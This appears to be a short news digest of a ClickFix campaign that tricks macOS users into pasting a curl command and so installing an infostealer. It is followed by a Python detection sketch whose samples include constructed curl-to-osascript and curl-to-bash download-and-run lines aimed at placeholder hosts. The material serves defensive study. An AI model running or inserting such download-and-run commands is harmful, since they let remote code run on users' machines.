
"ClickFix is a super popular social engineering tactic used to trick people into executing malicious commands on their own computers, usually by clicking a fake computer problem fix or CAPTCHA prompt."
"Upon detecting a desktop environment, the malware directs users to a fake CAPTCHA page, performs another inspection to determine the specific desktop OS, and then checks for macOS-specific strings within the user-agent."
"The fake CAPTCHA prompts the user to open Spotlight on their Mac, and then paste a 'verification code' into the search feature. The phony code is a curl command, and as soon as the victim hits Enter and executes it on their computer, the command silently downloads a malicious script."
The ClickFix campaign employs social engineering to trick macOS users into executing a malicious AppleScript that steals credentials and session cookies. The malware targets 14 browsers, 16 cryptocurrency wallets, and over 200 extensions. Victims are primarily in Asia's finance sector. The attack uses a fake CAPTCHA to prompt users to execute a command that downloads the infostealer. The malware operates on both Windows and macOS, filtering victims based on user-agent to deliver the appropriate payload.
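A defender-side sketch of the behaviour described above, added here as an example (it is not code from the article or the campaign): it flags process command lines in which `curl` fetches remote content and hands it directly to a shell or to `osascript`. The exact pasted command is not given on this page, so the patterns, heuristic names, and `example.invalid` hosts are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Interpreters that can run fetched text; osascript is the AppleScript runner.
SHELLS = r"(?:sh|bash|zsh|osascript)"
URL = re.compile(r"https?://[^\s\"')]+")
# curl given -s/--silent (alone or bundled, e.g. -fsSL) in the same command.
SILENT = re.compile(r"\bcurl\b[^|;&]*\s(?:-[A-Za-z]*s[A-Za-z]*|--silent)\b")
# curl output piped straight into an interpreter.
PIPED = re.compile(r"\bcurl\b[^|;&]*\|\s*(?:\S*/)?" + SHELLS + r"\b")
# curl output substituted into an interpreter's arguments: sh -c "$(curl ...)".
SUBST = re.compile(r"\b" + SHELLS + r"\b[^|;&]*\$\(\s*curl\b")


def assess(cmdline, allowed_hosts=frozenset()):
    """Return the heuristics a command line trips; an empty list means no alert."""
    hosts = {urlparse(u).hostname for u in URL.findall(cmdline)}
    if "curl" not in cmdline or not hosts or hosts <= set(allowed_hosts):
        return []
    hits = []
    if PIPED.search(cmdline):
        hits.append("piped_to_interpreter")
    if SUBST.search(cmdline):
        hits.append("substituted_into_interpreter")
    # Silence alone is common; it only adds weight to a download-and-run hit.
    if hits and SILENT.search(cmdline):
        hits.append("silent_download")
    return hits


def triage(cmdlines, allowed_hosts=frozenset()):
    """Map each flagged command line to the heuristics it tripped."""
    results = {c: assess(c, allowed_hosts) for c in cmdlines}
    return {c: h for c, h in results.items() if h}


# Constructed process-launch command lines (not taken from the campaign).
SAMPLES = [
    "curl -fsSL https://verify.example.invalid/check | osascript",
    'osascript -e "$(curl -s https://cdn.example.invalid/c)"',
    "curl -O https://downloads.example.invalid/tool.tar.gz",
    '/bin/bash -c "$(curl -fsSL https://pkg.example.invalid/install.sh)"',
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLES, {"pkg.example.invalid"}).items():
        print(hits, cmd)
```

Legitimate installers use the same download-and-run shape, which is why the host allowlist is part of the check; tune it to the software sources your fleet actually uses.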
Read at The Register